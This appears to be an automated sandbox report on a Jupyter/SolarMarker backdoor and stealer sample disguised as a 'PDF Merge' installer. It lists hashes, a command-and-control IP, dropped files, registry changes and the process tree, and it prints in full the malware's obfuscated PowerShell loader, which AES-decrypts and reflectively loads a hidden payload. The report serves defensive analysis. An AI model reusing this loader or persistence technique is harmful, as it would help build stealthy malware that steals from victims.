jupyter | 0e72b9cc2d4e3dd77041c51c127bd366ee293f9cb0b94a986b2174c9888593f1

Resubmissions

01-09-2022 19:57

220901-ypp62scdh3 10

13-06-2022 01:36

220613-b1kpdahbh9 10

14-03-2022 23:17

220314-29pmssdeh2 8

Analysis

max time kernel
455s
max time network
578s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
01-09-2022 19:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Size

256.0MB
MD5

0fa1be2db15ef78a9e01b21589204615
SHA1

933ad2d5ce1e31654a201b284abfc6ec88ad484c
SHA256

11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a
SHA512

13e51c96c51741348fa07d9072a686fc62d3f31af5d085893bce7247cd7de98d89e7d4318e69e7f4c3c3aa29ae41c9d6b1f98f73aab062dffbc7704a76e91be4
SSDEEP

98304:qKy3NiiXvj9F9tReyqp5qp3XOgGTM51NBZMjXeSKRw:GMgv5NUHO8TM53BZMjC6

Score

10^/10

jupyter backdoor stealer trojan

Malware Config

Extracted

Family

jupyter

http://146.70.53.153

Signatures

Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter

Executes dropped EXE 2 IoCs

pid	Process
2340	dpitgjcl.exe
2292	dpitgjcl.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nBXFjYoArVBtdujf.lnk	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe

Loads dropped DLL 13 IoCs

pid	Process
2340	dpitgjcl.exe
2340	dpitgjcl.exe
4492	MsiExec.exe
4492	MsiExec.exe
4492	MsiExec.exe
4492	MsiExec.exe
1248	MsiExec.exe
1248	MsiExec.exe
1248	MsiExec.exe
1248	MsiExec.exe
1248	MsiExec.exe
2340	dpitgjcl.exe
2340	dpitgjcl.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	dpitgjcl.exe
File opened (read-only)	\??\N:	dpitgjcl.exe
File opened (read-only)	\??\U:	dpitgjcl.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	dpitgjcl.exe
File opened (read-only)	\??\R:	dpitgjcl.exe
File opened (read-only)	\??\W:	dpitgjcl.exe
File opened (read-only)	\??\K:	dpitgjcl.exe
File opened (read-only)	\??\T:	dpitgjcl.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	dpitgjcl.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\J:	dpitgjcl.exe
File opened (read-only)	\??\Q:	dpitgjcl.exe
File opened (read-only)	\??\I:	dpitgjcl.exe
File opened (read-only)	\??\M:	dpitgjcl.exe
File opened (read-only)	\??\Z:	dpitgjcl.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	dpitgjcl.exe
File opened (read-only)	\??\P:	dpitgjcl.exe
File opened (read-only)	\??\Q:	dpitgjcl.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	dpitgjcl.exe
File opened (read-only)	\??\N:	dpitgjcl.exe
File opened (read-only)	\??\F:	dpitgjcl.exe
File opened (read-only)	\??\X:	dpitgjcl.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\E:	dpitgjcl.exe
File opened (read-only)	\??\M:	dpitgjcl.exe
File opened (read-only)	\??\G:	dpitgjcl.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	dpitgjcl.exe
File opened (read-only)	\??\O:	dpitgjcl.exe
File opened (read-only)	\??\B:	dpitgjcl.exe
File opened (read-only)	\??\L:	dpitgjcl.exe
File opened (read-only)	\??\U:	dpitgjcl.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	dpitgjcl.exe
File opened (read-only)	\??\V:	dpitgjcl.exe
File opened (read-only)	\??\A:	dpitgjcl.exe
File opened (read-only)	\??\V:	dpitgjcl.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\T:	dpitgjcl.exe
File opened (read-only)	\??\S:	dpitgjcl.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\S:	dpitgjcl.exe
File opened (read-only)	\??\X:	dpitgjcl.exe
File opened (read-only)	\??\H:	dpitgjcl.exe
File opened (read-only)	\??\Y:	dpitgjcl.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	dpitgjcl.exe
File opened (read-only)	\??\J:	dpitgjcl.exe
File opened (read-only)	\??\P:	msiexec.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\Uninstall.lnk	msiexec.exe
File created	C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\PdfMerge.exe	msiexec.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3413.tmp	msiexec.exe
File created	C:\Windows\Installer\e57273f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2819.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI31A1.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{50217A00-46B2-40E3-8664-5C93BFFA03B0}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI34A1.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3687.tmp	msiexec.exe
File created	C:\Windows\Installer\{50217A00-46B2-40E3-8664-5C93BFFA03B0}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{50217A00-46B2-40E3-8664-5C93BFFA03B0}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\e572741.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57273f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI30A6.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e	msiexec.exe

Modifies registry class 30 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\PackageName = "setup.msi"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\oadjsaxisaxlff\shell\open\command	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\oadjsaxisaxlff\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('kazO1yvy4lTDGClKjFyoFmLBxWJjCmZRIaspHISgMFQ=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\fxNsSSmvKhyitypXaXbxKAsEREfcen\\TYfXNgWzclnru.kAHTIdslvQdRxagipGxWmdoSo'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[ptT0HGWGyzqwKlTvqe.rDHifV7JMF4NnZ7K]::k0skBDu2A0m1W1RCxxG();\""	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\.kahtidslvqdrxagipgxwmdoso	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Version = "16777216"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F4F0CA507A84F414BAC0C1BAD6DB30E5\00A712052B643E046846C539FBAF300B	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\Free PDF Soulutions\\PDF Merge 1.0.0\\install\\FFA03B0\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\oadjsaxisaxlff	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\oadjsaxisaxlff\shell\open	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00A712052B643E046846C539FBAF300B	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\ProductName = "PDF Merge"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\oadjsaxisaxlff\shell	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\.kahtidslvqdrxagipgxwmdoso\ = "oadjsaxisaxlff"	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00A712052B643E046846C539FBAF300B\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\PackageCode = "01766D08FC959764791E3F5AB682B7F8"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F4F0CA507A84F414BAC0C1BAD6DB30E5	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\Free PDF Soulutions\\PDF Merge 1.0.0\\install\\FFA03B0\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media	msiexec.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4280	msiexec.exe
4280	msiexec.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	2340	dpitgjcl.exe
Token: SeAssignPrimaryTokenPrivilege	2340	dpitgjcl.exe
Token: SeLockMemoryPrivilege	2340	dpitgjcl.exe
Token: SeIncreaseQuotaPrivilege	2340	dpitgjcl.exe
Token: SeMachineAccountPrivilege	2340	dpitgjcl.exe
Token: SeTcbPrivilege	2340	dpitgjcl.exe
Token: SeSecurityPrivilege	2340	dpitgjcl.exe
Token: SeTakeOwnershipPrivilege	2340	dpitgjcl.exe
Token: SeLoadDriverPrivilege	2340	dpitgjcl.exe
Token: SeSystemProfilePrivilege	2340	dpitgjcl.exe
Token: SeSystemtimePrivilege	2340	dpitgjcl.exe
Token: SeProfSingleProcessPrivilege	2340	dpitgjcl.exe
Token: SeIncBasePriorityPrivilege	2340	dpitgjcl.exe
Token: SeCreatePagefilePrivilege	2340	dpitgjcl.exe
Token: SeCreatePermanentPrivilege	2340	dpitgjcl.exe
Token: SeBackupPrivilege	2340	dpitgjcl.exe
Token: SeRestorePrivilege	2340	dpitgjcl.exe
Token: SeShutdownPrivilege	2340	dpitgjcl.exe
Token: SeDebugPrivilege	2340	dpitgjcl.exe
Token: SeAuditPrivilege	2340	dpitgjcl.exe
Token: SeSystemEnvironmentPrivilege	2340	dpitgjcl.exe
Token: SeChangeNotifyPrivilege	2340	dpitgjcl.exe
Token: SeRemoteShutdownPrivilege	2340	dpitgjcl.exe
Token: SeUndockPrivilege	2340	dpitgjcl.exe
Token: SeSyncAgentPrivilege	2340	dpitgjcl.exe
Token: SeEnableDelegationPrivilege	2340	dpitgjcl.exe
Token: SeManageVolumePrivilege	2340	dpitgjcl.exe
Token: SeImpersonatePrivilege	2340	dpitgjcl.exe
Token: SeCreateGlobalPrivilege	2340	dpitgjcl.exe
Token: SeSecurityPrivilege	4280	msiexec.exe
Token: SeCreateTokenPrivilege	2340	dpitgjcl.exe
Token: SeAssignPrimaryTokenPrivilege	2340	dpitgjcl.exe
Token: SeLockMemoryPrivilege	2340	dpitgjcl.exe
Token: SeIncreaseQuotaPrivilege	2340	dpitgjcl.exe
Token: SeMachineAccountPrivilege	2340	dpitgjcl.exe
Token: SeTcbPrivilege	2340	dpitgjcl.exe
Token: SeSecurityPrivilege	2340	dpitgjcl.exe
Token: SeTakeOwnershipPrivilege	2340	dpitgjcl.exe
Token: SeLoadDriverPrivilege	2340	dpitgjcl.exe
Token: SeSystemProfilePrivilege	2340	dpitgjcl.exe
Token: SeSystemtimePrivilege	2340	dpitgjcl.exe
Token: SeProfSingleProcessPrivilege	2340	dpitgjcl.exe
Token: SeIncBasePriorityPrivilege	2340	dpitgjcl.exe
Token: SeCreatePagefilePrivilege	2340	dpitgjcl.exe
Token: SeCreatePermanentPrivilege	2340	dpitgjcl.exe
Token: SeBackupPrivilege	2340	dpitgjcl.exe
Token: SeRestorePrivilege	2340	dpitgjcl.exe
Token: SeShutdownPrivilege	2340	dpitgjcl.exe
Token: SeDebugPrivilege	2340	dpitgjcl.exe
Token: SeAuditPrivilege	2340	dpitgjcl.exe
Token: SeSystemEnvironmentPrivilege	2340	dpitgjcl.exe
Token: SeChangeNotifyPrivilege	2340	dpitgjcl.exe
Token: SeRemoteShutdownPrivilege	2340	dpitgjcl.exe
Token: SeUndockPrivilege	2340	dpitgjcl.exe
Token: SeSyncAgentPrivilege	2340	dpitgjcl.exe
Token: SeEnableDelegationPrivilege	2340	dpitgjcl.exe
Token: SeManageVolumePrivilege	2340	dpitgjcl.exe
Token: SeImpersonatePrivilege	2340	dpitgjcl.exe
Token: SeCreateGlobalPrivilege	2340	dpitgjcl.exe
Token: SeCreateTokenPrivilege	2292	dpitgjcl.exe
Token: SeAssignPrimaryTokenPrivilege	2292	dpitgjcl.exe
Token: SeLockMemoryPrivilege	2292	dpitgjcl.exe
Token: SeIncreaseQuotaPrivilege	2292	dpitgjcl.exe
Token: SeMachineAccountPrivilege	2292	dpitgjcl.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2340	dpitgjcl.exe
2340	dpitgjcl.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2904 wrote to memory of 2340	2904	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe	66
PID 2904 wrote to memory of 2340	2904	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe	66
PID 2904 wrote to memory of 2340	2904	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe	66
PID 2904 wrote to memory of 4916	2904	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe	67
PID 2904 wrote to memory of 4916	2904	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe	67
PID 4280 wrote to memory of 4492	4280	msiexec.exe	70
PID 4280 wrote to memory of 4492	4280	msiexec.exe	70
PID 4280 wrote to memory of 4492	4280	msiexec.exe	70
PID 2340 wrote to memory of 2292	2340	dpitgjcl.exe	71
PID 2340 wrote to memory of 2292	2340	dpitgjcl.exe	71
PID 2340 wrote to memory of 2292	2340	dpitgjcl.exe	71
PID 4280 wrote to memory of 1248	4280	msiexec.exe	74
PID 4280 wrote to memory of 1248	4280	msiexec.exe	74
PID 4280 wrote to memory of 1248	4280	msiexec.exe	74
PID 4916 wrote to memory of 5100	4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe	80
PID 4916 wrote to memory of 5100	4916	11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe	80
PID 5100 wrote to memory of 4424	5100	csc.exe	82
PID 5100 wrote to memory of 4424	5100	csc.exe	82

C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
"C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2904
- C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe
  "C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe
    "C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe" /i "C:\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\FFA03B0\setup.msi" EXECUTEACTION="INSTALL" SECONDSEQUENCE="1" CLIENTPROCESSID="2340" ADDLOCAL="MainFeature" ACTION="INSTALL" CLIENTUILEVEL="0" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs " AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" AI_DOTNET40_SEARCH="#1" TARGETDIR="C:\" APPDIR="C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF Merge"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe
  "C:\Users\Admin\AppData\Local\Temp\11543f09c416237d92090cebbefafdb2f03cec72a6f3fdedf8afe3c315181b5a.exe" /i
  2⤵
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hh14rmam\hh14rmam.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6CF.tmp" "c:\Users\Admin\AppData\Local\Temp\hh14rmam\CSCB9CD6CC1A8D04C4385BBA21B3B6785C3.TMP"
      4⤵
      PID:4424

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B51E1C4BEA13C03D401EF88A96F5E6DE C
  2⤵
  - Loads dropped DLL
  PID:4492
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding ADBC005E6B96F17CC69AC57725B050A5
  2⤵
  - Loads dropped DLL
  PID:1248

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1920

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MSIF0BE.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIFB1F.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIFD14.tmp

Filesize
266KB

MD5
75515f449d49e8f431a5cf109c603680

SHA1
0a32e62b50d3589cd25441ac2e463a695367da7f

SHA256
a0ff99c90d262e4f242b680b377dc93c6ee4fa7dd9041e7865709f3aaa1e1017

SHA512
8473aeb3853a0ec22a54398099b81a443bf56187257f2ca6b25f72a9ea4371cbedb671c49849d944e08849120a53e9456c2b697d3b4fdc911079e7543c2ff9c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIFE2E.tmp

Filesize
69KB

MD5
30e6c05c794e912b8f57f9c6e9449afc

SHA1
28a2bd4b61fafa633adad1ad0a7c8ceeaec48675

SHA256
5d3b2f3f1b00855aac7b95a585fa12ee532f59e06bb035efc8a20f30bfbf047d

SHA512
6da0d628caf6d540b8297fa9f8e7ed413c8a5a29da113d2371f3d931eebfa543842a90661e87a4517db28aca2eae429b476c540127e6ad046d31168249357d22

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF6CF.tmp

Filesize
1KB

MD5
8e4b4cb4033d6ba23e1114e4119c9a96

SHA1
55d561e09499643b0fb2c79ab3414c7fd7adac7b

SHA256
6c0abd5e72f8c8401e9a5286d8ec9ef1cdacd9284f803999f09ee497b3a3d2c1

SHA512
dac3f5b6dcfee954e436ab5336070a4c2af64be3079bdd849818905f5f2cadf6aa56b151a5c130b74fc9b556ae144c896862c54808e999c904bdb02fee108a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe

Filesize
4.2MB

MD5
0dae793f4d81ad44e9381ec8e017425f

SHA1
2908846d8d17393e4ae9a620ff6e80d039b8c4ce

SHA256
4f043b71d369c994a4911667829e0c7b639cd4c9929808ea6233800f21922336

SHA512
8df514c3009493295f70480da58decc31ab882433646843d5c3103c9a237cd1cc8d9cd64544f545adc3cd8de3c785a1cb3edc843f508357859db30f24182cda7

Download Submit
C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe

Filesize
4.2MB

MD5
0dae793f4d81ad44e9381ec8e017425f

SHA1
2908846d8d17393e4ae9a620ff6e80d039b8c4ce

SHA256
4f043b71d369c994a4911667829e0c7b639cd4c9929808ea6233800f21922336

SHA512
8df514c3009493295f70480da58decc31ab882433646843d5c3103c9a237cd1cc8d9cd64544f545adc3cd8de3c785a1cb3edc843f508357859db30f24182cda7

Download Submit
C:\Users\Admin\AppData\Local\Temp\dpitgjcl.exe

Filesize
4.2MB

MD5
0dae793f4d81ad44e9381ec8e017425f

SHA1
2908846d8d17393e4ae9a620ff6e80d039b8c4ce

SHA256
4f043b71d369c994a4911667829e0c7b639cd4c9929808ea6233800f21922336

SHA512
8df514c3009493295f70480da58decc31ab882433646843d5c3103c9a237cd1cc8d9cd64544f545adc3cd8de3c785a1cb3edc843f508357859db30f24182cda7

Download Submit
C:\Users\Admin\AppData\Local\Temp\hh14rmam\hh14rmam.dll

Filesize
3KB

MD5
218ea61a971b73ff99ddbf4918636a66

SHA1
7e8a9357e2d3d7bd2c9ebdeac8d0b0722b175982

SHA256
a8f9e76a8a66768fa4451201c42f78e64c262e89f6246a9497b9c4233eecef92

SHA512
f0ad3ea44d684a285acbf07b7e29e42214b490c6100deeb3e050420b9da068156bd236df9f7734c5c77655516080df2688c70975ba0f58dd41c4c0da39bb85f7

Download Submit
C:\Users\Admin\AppData\Roaming\Free PDF Soulutions\PDF Merge 1.0.0\install\FFA03B0\PdfMerge.exe

Filesize
6.9MB

MD5
f5b1bad514f3638f65bbe6765ba5af65

SHA1
